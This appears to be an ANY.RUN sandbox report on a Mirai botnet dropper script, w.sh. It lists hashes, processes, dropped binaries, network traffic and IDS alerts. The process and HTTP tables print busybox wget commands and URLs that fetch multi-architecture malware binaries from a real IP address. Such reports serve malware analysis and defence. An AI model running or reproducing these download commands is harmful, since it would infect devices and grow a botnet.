Malware analysis w.sh Malicious activity | ANY.RUN

Add for printing

File name:	w.sh
Full analysis:	https://app.any.run/tasks/8190837f-3617-4f23-bd23-5a3c4ee0a874
Verdict:	Malicious activity
Threats:	A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. Mirai is a self-propagating malware that scans the internet for vulnerable IoT devices and infects them to create a botnet. Mirai variants utilize lists of common default credentials to gain access to devices. Mirai's primary use is for launching distributed denial-of-service (DDoS) attacks, but it has also been used for cryptocurrency mining. Malware Trends Tracker >>>
Analysis date:	May 10, 2025, 07:03:03
OS:	Ubuntu 22.04.2
Tags:	auto mirai botnet
MIME:	text/plain
File info:	ASCII text
MD5:	2FAEDD9196685C5622D50C33E92B2118
SHA1:	A615F6BD9672328778E7B58FD31AFE7BAD3A5332
SHA256:	DDFB473ED21F7059516BBF0C58B5A7012944ABB394646D3128A02DF5429FEBF0
SSDEEP:	12:kmth3nomtXqomtONIjlTpjomtTiKl2LomtAomt26Oomtm9imomtzFG10pDomtQmI:jv3/NkcNIpNjwKlCco6AEgIyC5Owcn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
- BOTNET has been found (auto)
  - busybox (PID: 40691)
  - busybox (PID: 40707)
  - busybox (PID: 40711)
  - busybox (PID: 40676)
  - busybox (PID: 40703)
SUSPICIOUS
- Modifies file or directory owner
  - sudo (PID: 40661)
- Executes the "rm" command to delete files or directories
  - bash (PID: 40667)
- Executes commands using command-line interpreter
  - sudo (PID: 40666)
- Potential Corporate Privacy Violation
  - busybox (PID: 40672)
  - busybox (PID: 40687)
  - busybox (PID: 40695)
  - busybox (PID: 40703)
  - busybox (PID: 40711)
  - busybox (PID: 40676)
  - busybox (PID: 40707)
  - busybox (PID: 40717)
  - busybox (PID: 40691)
  - busybox (PID: 40699)
- Connects to the server without a host name
  - busybox (PID: 40717)
- Connects to unusual port
  - px86 (deleted) (PID: 40714)
INFO
No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

269

Monitored processes

47

Malicious processes

7

Suspicious processes

1

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
40660	/bin/sh -c "sudo chown user /tmp/w\.sh && chmod +x /tmp/w\.sh && DISPLAY=:0 sudo -iu user /tmp/w\.sh "	/usr/bin/dash	—	any-guest-agent
User: root Integrity Level: UNKNOWN Exit code: 0
40661	sudo chown user /tmp/w.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
40662	systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service	/usr/bin/systemctl	—	snapd
User: root Integrity Level: UNKNOWN Exit code: 0
40663	systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service	/usr/bin/systemctl	—	snapd
User: root Integrity Level: UNKNOWN Exit code: 0
40664	chown user /tmp/w.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
40665	chmod +x /tmp/w.sh	/usr/bin/chmod	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
40666	sudo -iu user /tmp/w.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
40667	-bash --login -c \/tmp\/w\.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 0
40668	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
40669	busybox wget http://193.32.162.74/bins/parm4	/usr/bin/busybox		bash
User: user Integrity Level: UNKNOWN Exit code: 256

Add for printing

Executable files

0

Suspicious files

10

Text files

0

Unknown types

0

Dropped files

PID	Process	Filename		Type
40672	busybox	/home/user/parm5		binary
		MD5:—	SHA256:—
40676	busybox	/home/user/parm6		binary
		MD5:—	SHA256:—
40687	busybox	/home/user/parm7		binary
		MD5:—	SHA256:—
40691	busybox	/home/user/psh4		binary
		MD5:—	SHA256:—
40695	busybox	/home/user/pppc		binary
		MD5:—	SHA256:—
40699	busybox	/home/user/pmips		binary
		MD5:—	SHA256:—
40703	busybox	/home/user/pmpsl		binary
		MD5:—	SHA256:—
40707	busybox	/home/user/pspc		binary
		MD5:—	SHA256:—
40711	busybox	/home/user/px86 (deleted)		binary
		MD5:—	SHA256:—
40717	busybox	/home/user/pm68k		binary
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

12

TCP/UDP connections

23

DNS requests

9

Threats

11

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	91.189.91.49:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
40669	busybox	GET	404	193.32.162.74:80	http://193.32.162.74/bins/parm4	unknown	—	—	—
40672	busybox	GET	200	193.32.162.74:80	http://193.32.162.74/bins/parm5	unknown	—	—	—
40676	busybox	GET	200	193.32.162.74:80	http://193.32.162.74/bins/parm6	unknown	—	—	—
40687	busybox	GET	200	193.32.162.74:80	http://193.32.162.74/bins/parm7	unknown	—	—	—
40711	busybox	GET	200	193.32.162.74:80	http://193.32.162.74/bins/px86	unknown	—	—	—
40717	busybox	GET	200	193.32.162.74:80	http://193.32.162.74/bins/pm68k	unknown	—	—	—
40695	busybox	GET	200	193.32.162.74:80	http://193.32.162.74/bins/pppc	unknown	—	—	—
40691	busybox	GET	200	193.32.162.74:80	http://193.32.162.74/bins/psh4	unknown	—	—	—
40703	busybox	GET	200	193.32.162.74:80	http://193.32.162.74/bins/pmpsl	unknown	—	—	—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	185.125.190.48:80	—	Canonical Group Limited	GB	unknown
—	—	195.181.175.41:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
—	—	91.189.91.49:80	—	Canonical Group Limited	US	unknown
—	—	185.125.188.58:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
—	—	185.125.188.54:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.59:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.54:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.57:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
40669	busybox	193.32.162.74:80	—	Bunea TELECOM SRL	RO	unknown

DNS requests

Domain	IP	Reputation
odrs.gnome.org	195.181.175.41 212.102.56.178 195.181.170.18 169.150.255.180 37.19.194.81 169.150.255.183 207.211.211.26 2a02:6ea0:c700::107 2a02:6ea0:c700::18 2a02:6ea0:c700::19 2a02:6ea0:c700::112 2a02:6ea0:c700::21 2a02:6ea0:c700::101 2a02:6ea0:c700::11	whitelisted
google.com	142.250.181.238 2a00:1450:4001:82b::200e	whitelisted
api.snapcraft.io	185.125.188.58 185.125.188.54 185.125.188.59 185.125.188.57 2620:2d:4000:1010::42 2620:2d:4000:1010::344 2620:2d:4000:1010::2e6 2620:2d:4000:1010::117	whitelisted
6.100.168.192.in-addr.arpa	—	unknown
connectivity-check.ubuntu.com	2620:2d:4000:1::97 2620:2d:4000:1::22 2620:2d:4000:1::2a 2620:2d:4002:1::196 2001:67c:1562::24 2001:67c:1562::23 2620:2d:4000:1::23 2620:2d:4002:1::198 2620:2d:4000:1::2b 2620:2d:4000:1::96 2620:2d:4000:1::98	whitelisted

Threats

PID	Process	Class	Message
—	—	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 38
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP

Add for printing

No debug info

General Info

w.sh

2FAEDD9196685C5622D50C33E92B2118

A615F6BD9672328778E7B58FD31AFE7BAD3A5332

DDFB473ED21F7059516BBF0C58B5A7012944ABB394646D3128A02DF5429FEBF0

12:kmth3nomtXqomtONIjlTpjomtTiKl2LomtAomt26Oomtm9imomtzFG10pDomtQmI:jv3/NkcNIpNjwKlCco6AEgIyC5Owcn

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

BOTNET has been found (auto)

SUSPICIOUS

Modifies file or directory owner

Executes the "rm" command to delete files or directories

Executes commands using command-line interpreter

Potential Corporate Privacy Violation

Connects to the server without a host name

Connects to unusual port

INFO

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings